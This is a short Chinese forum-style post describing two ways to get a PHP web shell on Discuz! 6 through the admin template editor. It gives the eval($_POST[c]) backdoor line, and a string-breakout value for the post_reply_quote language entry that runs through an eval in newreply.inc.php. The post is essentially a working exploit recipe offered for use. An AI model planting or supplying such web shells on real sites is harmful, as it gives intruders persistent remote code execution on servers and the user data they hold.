Discuz! 6 后台拿Shell的方法

　　如果后台可以在线编辑模板的话，下面的方法就可以拿SHELL了：)

　　1.后台编辑customfaq(customfaq.lang.php文件)

　　在

　　复制内容到剪贴板

　　代码:

　　eval($_POST[c]);

　　2.后台编辑misc(misc.lang.php文件)

　　把post_reply_quote对应的内容改为

　　复制内容到剪贴板

　　代码:

　　";eval($_POST[c]);"

　　在前台回帖处选择引用回复。

　　简单看下代码：

　　include/newreply.inc.php 107行：

　　复制内容到剪贴板

　　代码:

　　eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";");

　　呵呵，一个天然的后门：)